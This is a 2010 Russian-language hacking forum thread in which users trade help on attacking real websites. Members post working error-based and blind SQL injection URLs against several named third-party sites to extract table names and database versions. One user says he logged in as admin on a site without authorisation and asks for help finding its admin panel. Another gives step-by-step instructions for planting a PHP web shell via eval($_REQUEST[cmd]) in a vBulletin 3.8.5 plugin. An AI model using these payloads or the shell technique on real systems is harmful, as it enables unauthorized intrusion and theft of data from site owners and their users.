Ваши вопросы по уязвимостям.

547 · 21 Sep 2010

ктото с таким сталкивался?
http://www.chinashopunion.com/productinfo.php?id=109+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Дирижабль · 21 Sep 2010

547 said:

ктото с таким сталкивался?
http://www.chinashopunion.com/productinfo.php?id=109+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
Click to expand...
Code:
http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)

547 · 21 Sep 2010

[Feldmarschall] said:
Code:
http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)
Click to expand...
выдает:

жџҐиЇўе¤±иґҐ: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.tables group by 2 limit 1)a)' at line 1
Click to expand...

-PRIVAT- · 21 Sep 2010

547 said:

выдает:
Click to expand...

Он выдаёт при запросе http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+0,1)a)
Duplicate entry 'CHARACTER_SETS1' for key 1 То есть имя первой таблицы. Лимитом вот так перебирай их, лимит в середине запроса.

Дирижабль · 21 Sep 2010

547, ты пробелы убери >

547 · 21 Sep 2010

да я на самом деле шарю error based но иногда теряю бдительность
спасибо за помощь,убрал пробелы и все ок

Lilo · 21 Sep 2010

http://arbaleta.net/detail/1283'/
wtf?

mr.celt · 22 Sep 2010

Lilo said:

http://arbaleta.net/detail/1283'/
wtf?
Click to expand...

По-моему там ничего нет.

-PRIVAT- · 22 Sep 2010

Lilo said:

http://arbaleta.net/detail/1283'/
wtf?
Click to expand...

Просто ошибка вроде.

ALIM · 22 Sep 2010

есть скуля
http://www.libyaonline.com/business/pages.php?cid=298 order by 1 --
пишу union пишет ошибку
http://www.libyaonline.com/business/pages.php?cid=298%20union%20select%201/*
пробывал ч-з blind не выходит

R1dex · 22 Sep 2010

http://www.libyaonline.com/business/pages.php?cid=298+and+ascii(substring((select+1+from+users+limit+0,1),1,1))>1--

или

http://www.libyaonline.com/business/pages.php
?cid=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from users group by x)a)--

AloneKiller · 23 Sep 2010

Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?

Gedj · 23 Sep 2010

AloneKiller said:

Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?
Click to expand...

Через модули тем куча читай

gabarea · 23 Sep 2010

http://www.realitytvworld.com/index/articles/summary.php?i=133

shell_c0de:Еще раз такой пост увижу в БАН!
вам влом описать суть вопроса или тут должны догодатся и раскручивать вам ?

R1dex · 23 Sep 2010

http://www.realitytvworld.com/index/articles/summary.php?i=133 or(1,2)=(select*from(select name_const((select+version()),1),name_const((select+version()),1))a)

jecka3000 · 23 Sep 2010

помогите найти админку. Нашел /controlpanel/ & /login.php
Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(

mr.celt · 23 Sep 2010

jecka3000 said:

помогите найти админку. Нашел /controlpanel/ & /login.php
Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(
Click to expand...

Ссылку не выложишь? Как это: авторизацию прошел и никуда не редиректили?

kfor · 23 Sep 2010

jecka3000 said:

помогите найти админку. Нашел /controlpanel/ & /login.php
Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(
Click to expand...

Извини не выдержал.... У тебя перед глазами сайт и ты не нашёл где админка, а хочешь что бы мы могли угадать по двум словам? =)

Лан чтоб уж не пустозвонить ... ты из какого браузера заходишь? Иногда, бывает, что только в осле нормально работают некоторые админки. Так же может у тебя появились полномочия править статьи.. новости... походи по сайту и посмотри....

tracy · 23 Sep 2010

AloneKiller said:

Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?
Click to expand...

В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin]

вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем

шелл будет тут:
http://localhost/forum/faq.php?cmd=phpinfo();

Gorev · 23 Sep 2010

tracy said:

В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin]

вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем

шелл будет тут:
http://localhost/forum/faq.php?cmd=phpinfo();
Click to expand...

К чему весь этот цирк? потом все новичку привыкают при первом же вопросе постить в эту ветку, которая повторяет по тысячному разу одни и те же вопросы...посылать надо в поиск ...или если и хочется поможь то непосредственно линк на ветку, сейчас начнутся вопросы что такое евал итд и тп...

Ваши вопросы по уязвимостям.

547 Active Member

Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

547 Active Member

-PRIVAT- Banned

Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

547 Active Member

Lilo Banned

mr.celt Elder - Старейшина

-PRIVAT- Banned

ALIM Member

R1dex Elder - Старейшина

AloneKiller Banned

Gedj Elder - Старейшина

gabarea New Member

R1dex Elder - Старейшина

jecka3000 Elder - Старейшина

mr.celt Elder - Старейшина

kfor Elder - Старейшина

tracy Elder - Старейшина

Gorev Level 8

Useful Searches

Ваши вопросы по уязвимостям.

547 Active Member

Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

547 Active Member

-PRIVAT- Banned

Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

547 Active Member

Lilo Banned

mr.celt Elder - Старейшина

-PRIVAT- Banned

ALIM Member

R1dex Elder - Старейшина

AloneKiller Banned

Gedj Elder - Старейшина

gabarea New Member

R1dex Elder - Старейшина

jecka3000 Elder - Старейшина

mr.celt Elder - Старейшина

kfor Elder - Старейшина

tracy Elder - Старейшина

Gorev Level 8